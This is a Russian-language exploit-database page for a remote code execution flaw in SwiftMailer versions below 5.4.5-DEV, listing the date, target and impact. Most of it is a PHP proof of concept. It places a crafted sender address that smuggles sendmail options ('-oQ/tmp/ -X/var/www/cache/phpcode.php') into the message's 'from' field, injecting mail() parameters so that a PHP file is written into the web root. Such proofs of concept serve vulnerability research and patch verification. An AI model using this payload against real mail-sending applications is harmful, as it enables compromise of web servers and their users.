SwiftMailer < 5.4.5-DEV - Remote Code Execution

Свойства

Дата публикации:
29.12.2016
Цель:
SwiftMailer < 5.4.5-DEV
Тип воздействия:
Компрометация системы

Код


09607 <<< 
09607 <<< 
09607 <<< 
  
  
See the full advisory URL for the exploit details.
  
*/
  
  
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
  
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
 
// ------------------
  
// mail() param injection via the vulnerability in SwiftMailer
 
require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);
 
// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
  ->setFrom(array($email_from => 'PoC Exploit Payload'))
  ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
  ->setBody('Here is the message itself')
  ;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
 
?>
или введите имя

CAPTCHA